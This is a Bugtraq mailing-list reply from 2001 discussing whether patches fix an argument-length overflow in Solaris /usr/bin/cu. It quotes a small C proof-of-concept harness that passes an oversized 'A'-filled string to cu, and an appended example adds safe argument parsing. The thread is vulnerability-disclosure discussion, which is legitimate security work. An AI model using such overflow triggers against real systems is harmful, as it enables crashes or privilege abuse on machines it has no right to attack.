Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: optyx <optyx () UBERHAX0R NET>
Date: Tue, 30 Jan 2001 12:01:10 -0800
Dan Harkless <dan-bugtraq () DILVISH SPEED NET> wrote:
Are you implying the above patches fix the cu long hardlink name vulnerability? This is not the case, at least on 2.6:

    # cat > cu_exploit.c
    #include <stdio.h>

    void main(int argc,char **argv)
    {
      char *buf;
      buf = (char *) malloc(atoi(argv[1])*sizeof(char));
      memset(buf,0x41,atoi(argv[1])-1);
      buf[atoi(argv[1])-1]=0;
      execl("/usr/bin/cu",buf,(char *)0);
    }
    # gcc cu_exploit.c
    cu_exploit.c: In function `main':
    cu_exploit.c:4: warning: return type of `main' is not `int'
    # a.out
    Segmentation fault
See that atoi(argv[1])? a.out crashed, not /usr/bin/cu. Try a.out 4000 or whatever number next time, or trace through it with gdb.

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net, leeter than dog
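Added example (not code from either poster): the argument handling the quoted harness was missing. Running a.out with no argument makes atoi(argv[1]) dereference NULL, which is the Segmentation fault in the thread; the parse_length function below checks argc before touching argv[1] and validates the number with strtol instead of atoi. The function name and the MAX_LEN bound are assumptions for the demonstration.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Result codes returned by parse_length(). */
enum { LEN_OK = 0, LEN_MISSING = 1, LEN_INVALID = 2, LEN_RANGE = 3 };

/* Assumed upper bound for the test buffer; pick whatever fits your harness. */
#define MAX_LEN (1024L * 1024L)

/*
 * Read the buffer length from argv[1]. Unlike atoi(argv[1]) in the quoted
 * harness, this never touches argv[1] when it is absent (atoi(NULL) faults),
 * rejects trailing junk and non-numeric input (atoi silently returns 0),
 * and refuses zero, negative and oversized values.
 */
int parse_length(int argc, char **argv, long *out)
{
    char *end;
    long v;

    if (argc < 2 || argv[1] == NULL || argv[1][0] == '\0')
        return LEN_MISSING;              /* no length given: the a.out crash case */

    errno = 0;
    v = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0')
        return LEN_INVALID;              /* no digits, or junk after the number */
    if (errno == ERANGE || v < 1 || v > MAX_LEN)
        return LEN_RANGE;                /* overflow, zero/negative, or absurd size */

    *out = v;
    return LEN_OK;
}

int main(int argc, char **argv)
{
    long len;

    if (parse_length(argc, argv, &len) != LEN_OK) {
        fprintf(stderr, "usage: %s <length 1..%ld>\n", argv[0], MAX_LEN);
        return 1;
    }
    printf("length %ld accepted\n", len);
    return 0;
}
```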
Current thread:
- Solaris /usr/bin/cu Vulnerability Pablo Sor (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Casper Dik (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Solaris /usr/bin/cu Vulnerability hal King (Jan 23)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 30)
- <Possible follow-ups>
- Re: Solaris /usr/bin/cu Vulnerability Konrad Rieck (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Wietse Venema (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability optyx (Jan 30)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 31)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)